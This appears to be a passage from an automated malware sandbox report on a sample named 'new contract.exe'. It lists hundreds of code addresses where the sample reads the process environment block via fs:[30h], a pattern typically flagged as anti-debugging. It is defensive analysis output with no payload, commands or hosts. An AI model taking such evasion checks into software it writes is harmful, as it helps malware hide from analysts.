Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C5ED mov eax, dword ptr fs:[00000030h] 2_2_0165C5ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C5ED mov eax, dword ptr fs:[00000030h] 2_2_0165C5ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E5CF mov eax, dword ptr fs:[00000030h] 2_2_0165E5CF
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E5CF mov eax, dword ptr fs:[00000030h] 2_2_0165E5CF
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016265D0 mov eax, dword ptr fs:[00000030h] 2_2_016265D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0165A5D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0165A5D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h] 2_2_016A05A7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h] 2_2_016A05A7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h] 2_2_016A05A7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016445B1 mov eax, dword ptr fs:[00000030h] 2_2_016445B1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016445B1 mov eax, dword ptr fs:[00000030h] 2_2_016445B1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01622582 mov eax, dword ptr fs:[00000030h] 2_2_01622582
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01622582 mov ecx, dword ptr fs:[00000030h] 2_2_01622582
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01654588 mov eax, dword ptr fs:[00000030h] 2_2_01654588
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E59C mov eax, dword ptr fs:[00000030h] 2_2_0165E59C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC460 mov ecx, dword ptr fs:[00000030h] 2_2_016AC460
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h] 2_2_0164A470
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h] 2_2_0164A470
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h] 2_2_0164A470
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DA456 mov eax, dword ptr fs:[00000030h] 2_2_016DA456
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161645D mov eax, dword ptr fs:[00000030h] 2_2_0161645D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164245A mov eax, dword ptr fs:[00000030h] 2_2_0164245A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h] 2_2_0161E420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h] 2_2_0161E420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h] 2_2_0161E420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161C427 mov eax, dword ptr fs:[00000030h] 2_2_0161C427
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01658402 mov eax, dword ptr fs:[00000030h] 2_2_01658402
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01658402 mov eax, dword ptr fs:[00000030h] 2_2_01658402
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01658402 mov eax, dword ptr fs:[00000030h] 2_2_01658402
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016204E5 mov ecx, dword ptr fs:[00000030h] 2_2_016204E5
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016264AB mov eax, dword ptr fs:[00000030h] 2_2_016264AB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016544B0 mov ecx, dword ptr fs:[00000030h] 2_2_016544B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AA4B0 mov eax, dword ptr fs:[00000030h] 2_2_016AA4B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DA49A mov eax, dword ptr fs:[00000030h] 2_2_016DA49A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628770 mov eax, dword ptr fs:[00000030h] 2_2_01628770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165674D mov esi, dword ptr fs:[00000030h] 2_2_0165674D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165674D mov eax, dword ptr fs:[00000030h] 2_2_0165674D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165674D mov eax, dword ptr fs:[00000030h] 2_2_0165674D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620750 mov eax, dword ptr fs:[00000030h] 2_2_01620750
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662750 mov eax, dword ptr fs:[00000030h] 2_2_01662750
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662750 mov eax, dword ptr fs:[00000030h] 2_2_01662750
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE75D mov eax, dword ptr fs:[00000030h] 2_2_016AE75D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A4755 mov eax, dword ptr fs:[00000030h] 2_2_016A4755
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C720 mov eax, dword ptr fs:[00000030h] 2_2_0165C720
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C720 mov eax, dword ptr fs:[00000030h] 2_2_0165C720
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165273C mov eax, dword ptr fs:[00000030h] 2_2_0165273C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165273C mov ecx, dword ptr fs:[00000030h] 2_2_0165273C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165273C mov eax, dword ptr fs:[00000030h] 2_2_0165273C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169C730 mov eax, dword ptr fs:[00000030h] 2_2_0169C730
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C700 mov eax, dword ptr fs:[00000030h] 2_2_0165C700
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620710 mov eax, dword ptr fs:[00000030h] 2_2_01620710
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01650710 mov eax, dword ptr fs:[00000030h] 2_2_01650710
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016427ED mov eax, dword ptr fs:[00000030h] 2_2_016427ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016427ED mov eax, dword ptr fs:[00000030h] 2_2_016427ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016427ED mov eax, dword ptr fs:[00000030h] 2_2_016427ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE7E1 mov eax, dword ptr fs:[00000030h] 2_2_016AE7E1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016247FB mov eax, dword ptr fs:[00000030h] 2_2_016247FB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016247FB mov eax, dword ptr fs:[00000030h] 2_2_016247FB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0162C7C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A07C3 mov eax, dword ptr fs:[00000030h] 2_2_016A07C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016207AF mov eax, dword ptr fs:[00000030h] 2_2_016207AF
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D47A0 mov eax, dword ptr fs:[00000030h] 2_2_016D47A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C678E mov eax, dword ptr fs:[00000030h] 2_2_016C678E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E866E mov eax, dword ptr fs:[00000030h] 2_2_016E866E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E866E mov eax, dword ptr fs:[00000030h] 2_2_016E866E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A660 mov eax, dword ptr fs:[00000030h] 2_2_0165A660
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A660 mov eax, dword ptr fs:[00000030h] 2_2_0165A660
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01652674 mov eax, dword ptr fs:[00000030h] 2_2_01652674
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163C640 mov eax, dword ptr fs:[00000030h] 2_2_0163C640
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E627 mov eax, dword ptr fs:[00000030h] 2_2_0163E627
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01656620 mov eax, dword ptr fs:[00000030h] 2_2_01656620
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01658620 mov eax, dword ptr fs:[00000030h] 2_2_01658620
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162262C mov eax, dword ptr fs:[00000030h] 2_2_0162262C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E609 mov eax, dword ptr fs:[00000030h] 2_2_0169E609
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662619 mov eax, dword ptr fs:[00000030h] 2_2_01662619
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0169E6F2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0169E6F2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0169E6F2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0169E6F2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A06F1 mov eax, dword ptr fs:[00000030h] 2_2_016A06F1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A06F1 mov eax, dword ptr fs:[00000030h] 2_2_016A06F1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0165A6C7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0165A6C7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0165C6A6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016566B0 mov eax, dword ptr fs:[00000030h] 2_2_016566B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624690 mov eax, dword ptr fs:[00000030h] 2_2_01624690
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624690 mov eax, dword ptr fs:[00000030h] 2_2_01624690
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01646962 mov eax, dword ptr fs:[00000030h] 2_2_01646962
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01646962 mov eax, dword ptr fs:[00000030h] 2_2_01646962
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01646962 mov eax, dword ptr fs:[00000030h] 2_2_01646962
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0166096E mov eax, dword ptr fs:[00000030h] 2_2_0166096E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0166096E mov edx, dword ptr fs:[00000030h] 2_2_0166096E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0166096E mov eax, dword ptr fs:[00000030h] 2_2_0166096E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C4978 mov eax, dword ptr fs:[00000030h] 2_2_016C4978
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C4978 mov eax, dword ptr fs:[00000030h] 2_2_016C4978
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC97C mov eax, dword ptr fs:[00000030h] 2_2_016AC97C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A0946 mov eax, dword ptr fs:[00000030h] 2_2_016A0946
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4940 mov eax, dword ptr fs:[00000030h] 2_2_016F4940
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A892A mov eax, dword ptr fs:[00000030h] 2_2_016A892A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B892B mov eax, dword ptr fs:[00000030h] 2_2_016B892B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E908 mov eax, dword ptr fs:[00000030h] 2_2_0169E908
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E908 mov eax, dword ptr fs:[00000030h] 2_2_0169E908
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC912 mov eax, dword ptr fs:[00000030h] 2_2_016AC912
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01618918 mov eax, dword ptr fs:[00000030h] 2_2_01618918
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01618918 mov eax, dword ptr fs:[00000030h] 2_2_01618918
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE9E0 mov eax, dword ptr fs:[00000030h] 2_2_016AE9E0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016529F9 mov eax, dword ptr fs:[00000030h] 2_2_016529F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016529F9 mov eax, dword ptr fs:[00000030h] 2_2_016529F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B69C0 mov eax, dword ptr fs:[00000030h] 2_2_016B69C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016549D0 mov eax, dword ptr fs:[00000030h] 2_2_016549D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EA9D3 mov eax, dword ptr fs:[00000030h] 2_2_016EA9D3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016209AD mov eax, dword ptr fs:[00000030h] 2_2_016209AD
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016209AD mov eax, dword ptr fs:[00000030h] 2_2_016209AD
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A89B3 mov esi, dword ptr fs:[00000030h] 2_2_016A89B3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A89B3 mov eax, dword ptr fs:[00000030h] 2_2_016A89B3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A89B3 mov eax, dword ptr fs:[00000030h] 2_2_016A89B3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE872 mov eax, dword ptr fs:[00000030h] 2_2_016AE872
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE872 mov eax, dword ptr fs:[00000030h] 2_2_016AE872
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B6870 mov eax, dword ptr fs:[00000030h] 2_2_016B6870
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B6870 mov eax, dword ptr fs:[00000030h] 2_2_016B6870
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01632840 mov ecx, dword ptr fs:[00000030h] 2_2_01632840
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01650854 mov eax, dword ptr fs:[00000030h] 2_2_01650854
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624859 mov eax, dword ptr fs:[00000030h] 2_2_01624859
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624859 mov eax, dword ptr fs:[00000030h] 2_2_01624859
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov ecx, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A830 mov eax, dword ptr fs:[00000030h] 2_2_0165A830
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C483A mov eax, dword ptr fs:[00000030h] 2_2_016C483A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C483A mov eax, dword ptr fs:[00000030h] 2_2_016C483A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC810 mov eax, dword ptr fs:[00000030h] 2_2_016AC810
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EA8E4 mov eax, dword ptr fs:[00000030h] 2_2_016EA8E4
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0165C8F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0165C8F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0164E8C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F08C0 mov eax, dword ptr fs:[00000030h] 2_2_016F08C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620887 mov eax, dword ptr fs:[00000030h] 2_2_01620887
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC89D mov eax, dword ptr fs:[00000030h] 2_2_016AC89D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161CB7E mov eax, dword ptr fs:[00000030h] 2_2_0161CB7E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D4B4B mov eax, dword ptr fs:[00000030h] 2_2_016D4B4B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D4B4B mov eax, dword ptr fs:[00000030h] 2_2_016D4B4B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B6B40 mov eax, dword ptr fs:[00000030h] 2_2_016B6B40
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B6B40 mov eax, dword ptr fs:[00000030h] 2_2_016B6B40
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EAB40 mov eax, dword ptr fs:[00000030h] 2_2_016EAB40
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C8B42 mov eax, dword ptr fs:[00000030h] 2_2_016C8B42
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01618B50 mov eax, dword ptr fs:[00000030h] 2_2_01618B50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F2B57 mov eax, dword ptr fs:[00000030h] 2_2_016F2B57
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F2B57 mov eax, dword ptr fs:[00000030h] 2_2_016F2B57
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F2B57 mov eax, dword ptr fs:[00000030h] 2_2_016F2B57
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F2B57 mov eax, dword ptr fs:[00000030h] 2_2_016F2B57
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CEB50 mov eax, dword ptr fs:[00000030h] 2_2_016CEB50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164EB20 mov eax, dword ptr fs:[00000030h] 2_2_0164EB20
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164EB20 mov eax, dword ptr fs:[00000030h] 2_2_0164EB20
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E8B28 mov eax, dword ptr fs:[00000030h] 2_2_016E8B28
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E8B28 mov eax, dword ptr fs:[00000030h] 2_2_016E8B28
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4B00 mov eax, dword ptr fs:[00000030h] 2_2_016F4B00
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h] 2_2_0169EB1D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h] 2_2_0169EB1D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h] 2_2_0169EB1D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h] 2_2_0169EB1D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h] 2_2_0169EB1D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h] 2_2_0169EB1D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h] 2_2_0169EB1D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h] 2_2_0169EB1D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h] 2_2_0169EB1D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628BF0 mov eax, dword ptr fs:[00000030h] 2_2_01628BF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628BF0 mov eax, dword ptr fs:[00000030h] 2_2_01628BF0
